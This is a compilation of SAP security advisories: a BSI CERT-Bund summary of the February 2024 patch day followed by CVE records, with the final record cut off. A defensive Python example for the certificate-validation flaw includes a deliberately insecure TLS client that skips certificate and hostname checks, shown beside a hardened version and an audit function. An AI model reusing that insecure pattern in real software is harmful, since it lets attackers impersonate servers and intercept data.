wid-sec-w-2024-0355
Vulnerability from csaf_certbund
Published
2024-02-12 23:00
Modified
2024-02-12 23:00
Summary
SAP Software: Multiple Vulnerabilities
Notes
As the provider of the content it makes available for use, the BSI is responsible for that content under the general laws. Users, however, are responsible for carefully checking, case by case, the use and/or implementation of the information supplied with the content.
Product description
SAP provides enterprise-wide solutions for business processes such as accounting, sales, purchasing and warehouse management.
Attack
A remote attacker can exploit multiple vulnerabilities in SAP software to escalate privileges, execute arbitrary code, disclose confidential information, manipulate files or carry out cross-site scripting (XSS) attacks.
Affected operating systems
- UNIX
- Linux
- Windows
CSAF document metadata
- Aggregate severity: hoch (high)
- Category: csaf_base; CSAF version: 2.0
- Distribution: TLP:WHITE (https://www.first.org/tlp/)
- Language: de-DE; source language: en-US
- Publisher: Bundesamt für Sicherheit in der Informationstechnik (https://www.bsi.bund.de), category other, contact csaf-provider@cert-bund.de
- Tracking: ID WID-SEC-W-2024-0355, version 1, status final; initial release 2024-02-12T23:00:00.000+00:00; current release 2024-02-12T23:00:00.000+00:00
- Generator: BSI-WID 1.3.5 (2024-08-15T18:05:07.923+00:00)
- Revision history: 1 (2024-02-12T23:00:00.000+00:00): initial version

References
- WID-SEC-W-2024-0355 - CSAF Version: https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-0355.json
- WID-SEC-2024-0355 - Portal Version: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-0355
- SAP Security Patch Day – February 2024, 2024-02-12 (external): https://support.sap.com/en/my-support/knowledge-base/security-notes-news/february-2024.html

Product tree
Vendor | Product | Product ID | CPE
---|---|---|---
SAP | SAP Software | T032707 | cpe:/a:sap:sap:-

Vulnerabilities
All of the entries below carry the same description, the same product status (known affected: T032707) and the same release date (2024-02-12T23:00:00.000+00:00):

Multiple vulnerabilities exist in SAP software. These flaws are present in several subsystems, components and modules such as WebClient UI, Bank Account Management, Cloud Connector or NetWeaver, due to several security-relevant problems such as improper certificate validation, a missing authorization check or directory traversal issues. A remote attacker can exploit these vulnerabilities to escalate privileges, execute arbitrary code, disclose confidential information, manipulate files or carry out cross-site scripting (XSS) attacks. Some of the vulnerabilities require user interaction to be exploited successfully.

- CVE-2024-25643
- CVE-2024-25642
- CVE-2024-24743
- CVE-2024-24742
- CVE-2024-24741
- CVE-2024-24740
- CVE-2024-24739
- CVE-2024-22132
- CVE-2024-22131
- CVE-2024-22130
- CVE-2024-22129
- CVE-2024-22128
- CVE-2024-22126
- CVE-2023-49580
- CVE-2023-49058
cve-2024-24743
Vulnerability from cvelistv5
Published
2024-02-13 02:43
Modified
2024-11-07 19:10
Severity
CVSS v3.1 base score 8.6 (HIGH); vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N (attack vector NETWORK, attack complexity LOW, privileges required NONE, user interaction NONE, scope CHANGED, confidentiality HIGH, integrity NONE, availability NONE)
Summary
SAP NetWeaver AS Java (CAF - Guided Procedures) - version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable him to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected.
Problem type
CWE-611: Improper Restriction of XML External Entity Reference
References
- https://me.sap.com/notes/3426111
- https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP NetWeaver AS Java (Guided Procedures) | 7.50
Record metadata
- Title: XXE vulnerability in SAP NetWeaver AS Java (Guided Procedures)
- CVE ID: CVE-2024-24743; state PUBLISHED; record format CVE_RECORD, data version 5.1
- Assigner: sap (orgId e4686d1a-f260-4930-ac4c-2f5c992778dd); generator Vulnogram 0.1.0-dev; discovery source UNKNOWN
- Reserved 2024-01-29T05:13:46.618Z; published 2024-02-13T02:43:40.755Z; last updated 2024-11-07T19:10:20.078Z
- Affected-product default status: unaffected (only the listed version is marked affected)
- CISA ADP Vulnrichment (SSVC 2.0.3, role CISA Coordinator, 2024-02-13T15:39:45.926455Z; container updated 2024-11-07T19:10:20.078Z): Exploitation none; Automatable yes; Technical Impact partial
- CVE Program Container (updated 2024-08-01T23:28:11.817Z): the two references above, tagged x_transferred
cve-2024-22128
Vulnerability from cvelistv5
Published
2024-02-13 02:02
Modified
2024-08-01 22:35
Severity
CVSS v3.1 base score 4.7 (MEDIUM); vector CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N (attack vector NETWORK, attack complexity HIGH, privileges required NONE, user interaction REQUIRED, scope CHANGED, confidentiality LOW, integrity LOW, availability NONE)
Summary
SAP NWBC for HTML - versions SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An unauthenticated attacker can inject malicious javascript to cause limited impact to confidentiality and integrity of the application data after successful exploitation.
Problem type
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
References
- https://me.sap.com/notes/3396109
- https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP NetWeaver Business Client for HTML | SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731
Record metadata
- Title: Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Business Client for HTML
- CVE ID: CVE-2024-22128; state PUBLISHED; record format CVE_RECORD, data version 5.1
- Assigner: sap (orgId e4686d1a-f260-4930-ac4c-2f5c992778dd); generator Vulnogram 0.1.0-dev; discovery source UNKNOWN
- Reserved 2024-01-05T10:21:35.256Z; published 2024-02-13T02:02:14.281Z; last updated 2024-08-01T22:35:34.814Z
- Affected-product default status: unaffected (only the listed versions are marked affected)
- CISA ADP Vulnrichment (SSVC 2.0.3, role CISA Coordinator, 2024-02-13T15:55:00.643408Z; container updated 2024-06-04T17:52:30.808Z): Exploitation none; Automatable no; Technical Impact partial
- CVE Program Container (updated 2024-08-01T22:35:34.814Z): the two references above, tagged x_transferred
cve-2023-49058
Vulnerability from cvelistv5
Published
2023-12-12 01:01
Modified
2024-08-02 21:46
Severity
CVSS v3.1 base score 3.5 (LOW); vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N (attack vector NETWORK, attack complexity HIGH, privileges required LOW, user interaction NONE, scope CHANGED, confidentiality LOW, integrity NONE, availability NONE)
Summary
SAP Master Data Governance File Upload application allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing ‘traverse to parent directory’ are passed through to the file APIs. As a result, it has a low impact to the confidentiality.
Problem type
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
References
- https://me.sap.com/notes/3363690
- https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP Master Data Governance | MDG_FND 731, MDG_FND 732, MDG_FND 746, MDG_FND 747, MDG_FND 748, MDG_FND 749, MDG_FND 752, MDG_FND 800, MDG_FND 802, MDG_FND 803, MDG_FND 804, MDG_FND 805, MDG_FND 806, MDG_FND 807, MDG_FND 808, SAP_BS_FND 702
Record metadata
- Title: Directory Traversal vulnerability in SAP Master Data Governance
- CVE ID: CVE-2023-49058; state PUBLISHED; record format CVE_RECORD, data version 5.1
- Assigner: sap (orgId e4686d1a-f260-4930-ac4c-2f5c992778dd); generator Vulnogram 0.1.0-dev; discovery source UNKNOWN
- Reserved 2023-11-20T11:31:43.313Z; published 2023-12-12T01:01:07.964Z; last updated 2024-08-02T21:46:29.250Z
- Affected-product default status: unaffected (only the listed versions are marked affected)
- CVE Program Container (updated 2024-08-02T21:46:29.250Z): the two references above, tagged x_transferred
cve-2024-22126
Vulnerability from cvelistv5
Published
2024-02-13 01:58
Modified
2025-02-11 04:13
Severity
CVSS v3.1 base score 6.1 (MEDIUM); vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (attack vector NETWORK, attack complexity LOW, privileges required NONE, user interaction REQUIRED, scope CHANGED, confidentiality LOW, integrity LOW, availability NONE)
Summary
The User Admin application of SAP NetWeaver AS for Java - version 7.50, insufficiently validates and improperly encodes the incoming URL parameters before including them into the redirect URL. This results in Cross-Site Scripting (XSS) vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.
Problem type
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
References
- https://me.sap.com/notes/3417627
- https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
- https://me.sap.com/notes/3557138
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP NetWeaver AS Java (User Admin Application) | 7.50
Record metadata
- Title: Cross Site Scripting vulnerability in SAP NetWeaver AS Java (User Admin Application)
- CVE ID: CVE-2024-22126; state PUBLISHED; record format CVE_RECORD, data version 5.1
- Assigner: sap (orgId e4686d1a-f260-4930-ac4c-2f5c992778dd); generator Vulnogram 0.1.0-dev; discovery source UNKNOWN
- Reserved 2024-01-05T10:21:35.256Z; published 2024-02-13T01:58:27.745Z; last updated 2025-02-11T04:13:01.325Z
- Affected-product default status: unaffected (only the listed version is marked affected)
- CISA ADP Vulnrichment (SSVC 2.0.3, role CISA Coordinator, 2024-07-09T16:21:27.522736Z; container updated 2024-07-09T16:21:33.204Z): Exploitation none; Automatable no; Technical Impact partial
- CVE Program Container (updated 2024-08-01T22:35:34.804Z): the first two references above, tagged x_transferred
cve-2024-24741
Vulnerability from cvelistv5
Published
2024-02-13 03:43
Modified
2024-08-01 23:28
Summary
SAP Master Data Governance for Material Data - versions 618, 619, 620, 621, 622, 800, 801, 802, 803, 804, does not perform the necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to read some sensitive information, but there is no impact on integrity or availability.
References
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP Master Data Governance Material | 618, 619, 620, 621, 622, 800, 801, 802, 803, 804
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-24741", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-02-13T20:21:03.015929Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-06-04T17:43:06.598Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T23:28:12.084Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/2897391", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Master Data Governance Material", vendor: "SAP_SE", versions: [ { status: "affected", version: "618", }, { status: "affected", version: "619", }, { status: "affected", version: "620", }, { status: "affected", version: "621", }, { status: "affected", version: "622", }, { status: "affected", version: "800", }, { status: "affected", version: "801", }, { status: "affected", version: "802", }, { status: "affected", version: "803", }, { status: "affected", version: "804", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP Master Data Governance for Material Data - versions 618, 619, 620, 621, 622, 800, 801, 802, 803, 804, does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. 
This could allow an attacker to read some sensitive information but no impact to integrity and availability.</p>", }, ], value: "SAP Master Data Governance for Material Data - versions 618, 619, 620, 621, 622, 800, 801, 802, 803, 804, does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to read some sensitive information but no impact to integrity and availability.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-862", description: "CWE-862: Missing Authorization", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T03:43:14.238Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/2897391", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Missing Authorization check in SAP Master Data Governance Material", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24741", datePublished: "2024-02-13T03:43:14.238Z", dateReserved: "2024-01-29T05:13:46.617Z", dateUpdated: "2024-08-01T23:28:12.084Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-25642
Vulnerability from cvelistv5
Published
2024-02-13 02:44
Modified
2025-02-13 17:40
Summary
Due to improper certificate validation in SAP Cloud Connector - version 2.0, an attacker can impersonate the genuine servers that interact with SCC, breaking the mutual authentication. The attacker can then intercept requests to view or modify sensitive information. There is no impact on the availability of the system.
References
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP Cloud Connector | 2.0
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T23:44:09.866Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3424610", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, { tags: [ "x_transferred", ], url: "http://seclists.org/fulldisclosure/2024/May/26", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP Cloud Connector", vendor: "SAP_SE", versions: [ { status: "affected", version: "2.0", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>Due to improper validation of certificate in SAP Cloud Connector - version 2.0, attacker can impersonate the genuine servers to interact with SCC breaking the mutual authentication. Hence, the attacker can intercept the request to view/modify sensitive information. There is no impact on the availability of the system.</p>", }, ], value: "Due to improper validation of certificate in SAP Cloud Connector - version 2.0, attacker can impersonate the genuine servers to interact with SCC breaking the mutual authentication. Hence, the attacker can intercept the request to view/modify sensitive information. 
There is no impact on the availability of the system.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-295", description: "CWE-295: Improper Certificate Validation", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-06-10T16:08:29.499Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3424610", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, { url: "http://seclists.org/fulldisclosure/2024/May/26", }, ], source: { discovery: "UNKNOWN", }, title: "Improper Certificate Validation in SAP Cloud Connector", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-25642", datePublished: "2024-02-13T02:44:20.284Z", dateReserved: "2024-02-09T04:10:20.036Z", dateUpdated: "2025-02-13T17:40:53.057Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
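CVE-2024-25642 is a CWE-295 case: the client side of a mutually authenticated TLS link does not properly check the certificate the server presents, so anyone who can get traffic routed to them can stand in for the real peer. The Python example below is added here and is not SAP's code or anything from note 3424610; the CA bundle and client certificate paths are assumptions. It puts the weak client configuration next to a correct one, and adds a small audit function that flags the settings which would let an impersonating server through (no chain validation, no hostname check, old protocol floor).

```python
import socket
import ssl
from typing import Optional


def make_insecure_context() -> ssl.SSLContext:
    """The CWE-295 failure mode: a client that accepts any server certificate."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # must be cleared before verify_mode can be relaxed
    ctx.verify_mode = ssl.CERT_NONE  # no chain validation at all
    return ctx


def make_client_context(ca_file: Optional[str] = None,
                        client_cert: Optional[str] = None,
                        client_key: Optional[str] = None) -> ssl.SSLContext:
    """A client context that verifies the peer and can present its own certificate.

    ca_file: PEM bundle of the CAs allowed to sign the server certificate (assumed path;
             None falls back to the platform trust store). Pinning to the private CA that
             issued the backend's certificate is the right choice for a known peer.
    client_cert/client_key: this side's certificate and key for mutual TLS (assumed paths).
    """
    ctx = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH, cafile=ca_file)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.check_hostname = True                # the name in the certificate must match the peer
    ctx.verify_mode = ssl.CERT_REQUIRED      # chain must validate to a trusted CA
    if client_cert:
        ctx.load_cert_chain(client_cert, client_key)
    return ctx


def audit_context(ctx: ssl.SSLContext) -> list:
    """Return the settings that would let an impersonating server through."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode is not CERT_REQUIRED: certificate chain is not validated")
    if not ctx.check_hostname:
        findings.append("check_hostname is False: a valid certificate for any name is accepted")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum_version below TLS 1.2")
    return findings


def open_verified(host: str, port: int, ctx: ssl.SSLContext, timeout: float = 5.0) -> ssl.SSLSocket:
    """Connect and hand the expected name to the TLS layer.

    With a context from make_client_context(), a server presenting a certificate that does
    not chain to the trusted CA, or that carries a different name, raises
    ssl.SSLCertVerificationError during the handshake instead of silently connecting.
    """
    sock = socket.create_connection((host, port), timeout=timeout)
    return ctx.wrap_socket(sock, server_hostname=host)


if __name__ == "__main__":
    print("insecure:", audit_context(make_insecure_context()))
    print("hardened:", audit_context(make_client_context()))
```

The audit function is what you would run against any TLS client wrapper in a code base: the two settings it checks first are exactly the ones that get disabled "temporarily" during integration work and then shipped.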
cve-2024-22132
Vulnerability from cvelistv5
Published
2024-02-13 02:33
Modified
2024-08-01 22:35
Summary
SAP IDES ECC systems contain code that permits the execution of arbitrary program code of the user's choice. An attacker can therefore control the behaviour of the system by executing malicious code, which can potentially escalate privileges with low impact on confidentiality, integrity and availability of the system.
References
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP IDES Systems | All version
{ containers: { adp: [ { metrics: [ { other: { content: { id: "CVE-2024-22132", options: [ { Exploitation: "none", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-05-07T04:00:24.595973Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-08-01T17:30:59.546Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.859Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3421659", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "affected", product: "SAP IDES Systems", vendor: "SAP_SE", versions: [ { status: "affected", version: "All version", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP IDES ECC-systems contain code that permits the execution of arbitrary program code of user's choice.An attacker can therefore control the behaviour of the system by executing malicious code which can potentially escalate privileges with low impact on confidentiality, integrity and availability of the system.</p>", }, ], value: "SAP IDES ECC-systems contain code that permits the execution of arbitrary program code of user's choice.An attacker can therefore control the behaviour of the system by executing malicious code which can potentially escalate privileges with low impact on confidentiality, integrity and availability of the system.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: 
"CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-78", description: "CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:33:01.622Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3421659", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Code Injection vulnerability in SAP IDES Systems", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22132", datePublished: "2024-02-13T02:33:01.622Z", dateReserved: "2024-01-05T10:21:35.256Z", dateUpdated: "2024-08-01T22:35:34.859Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-24739
Vulnerability from cvelistv5
Published
2024-02-13 02:34
Modified
2024-08-01 23:28
Summary
SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application.
References
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP BAM (Bank Account Management) | SAP_FIN 618, SAP_FIN 730, S4CORE 100, 101
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T23:28:12.038Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/2637727", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP BAM (Bank Account Management)", vendor: "SAP_SE", versions: [ { status: "affected", version: "SAP_FIN 618", }, { status: "affected", version: "SAP_FIN 730", }, { status: "affected", version: "S4CORE 100", }, { status: "affected", version: "101", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application.</p>", }, ], value: "SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 6.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-862", description: "CWE-862: Missing Authorization", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:34:17.247Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: 
"sap", }, references: [ { url: "https://me.sap.com/notes/2637727", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Missing authorization check in SAP BAM (Bank Account Management)", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-24739", datePublished: "2024-02-13T02:34:17.247Z", dateReserved: "2024-01-29T05:13:46.617Z", dateUpdated: "2024-08-01T23:28:12.038Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2024-22130
Vulnerability from cvelistv5
Published
2024-02-13 02:29
Modified
2024-08-01 22:35
Summary
The print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting vulnerability. An attacker with low privileges can cause limited impact to confidentiality and integrity of the application data after successful exploitation.
References
Impacted products
Vendor | Product | Version
---|---|---
SAP_SE | SAP CRM WebClient UI | S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-01T22:35:34.802Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://me.sap.com/notes/3410875", }, { tags: [ "x_transferred", ], url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { defaultStatus: "unaffected", product: "SAP CRM WebClient UI", vendor: "SAP_SE", versions: [ { status: "affected", version: "S4FND 102", }, { status: "affected", version: "S4FND 103", }, { status: "affected", version: "S4FND 104", }, { status: "affected", version: "S4FND 105", }, { status: "affected", version: "S4FND 106", }, { status: "affected", version: "S4FND 107", }, { status: "affected", version: "S4FND 108", }, { status: "affected", version: "WEBCUIF 700", }, { status: "affected", version: "WEBCUIF 701", }, { status: "affected", version: "WEBCUIF 730", }, { status: "affected", version: "WEBCUIF 731", }, { status: "affected", version: "WEBCUIF 746", }, { status: "affected", version: "WEBCUIF 747", }, { status: "affected", version: "WEBCUIF 748", }, { status: "affected", version: "WEBCUIF 800", }, { status: "affected", version: "WEBCUIF 801", }, ], }, ], descriptions: [ { lang: "en", supportingMedia: [ { base64: false, type: "text/html", value: "<p>Print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. 
An attacker with low privileges can cause limited impact to confidentiality and integrity of the appliaction data after successful exploitation.</p>", }, ], value: "Print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. An attacker with low privileges can cause limited impact to confidentiality and integrity of the appliaction data after successful exploitation.\n\n", }, ], metrics: [ { cvssV3_1: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.6, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", version: "3.1", }, format: "CVSS", scenarios: [ { lang: "en", value: "GENERAL", }, ], }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "eng", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-02-13T02:29:51.706Z", orgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", shortName: "sap", }, references: [ { url: "https://me.sap.com/notes/3410875", }, { url: "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html", }, ], source: { discovery: "UNKNOWN", }, title: "Cross-Site Scripting (XSS) vulnerability in SAP CRM WebClient UI", x_generator: { engine: "Vulnogram 0.1.0-dev", }, }, }, cveMetadata: { assignerOrgId: "e4686d1a-f260-4930-ac4c-2f5c992778dd", assignerShortName: "sap", cveId: "CVE-2024-22130", 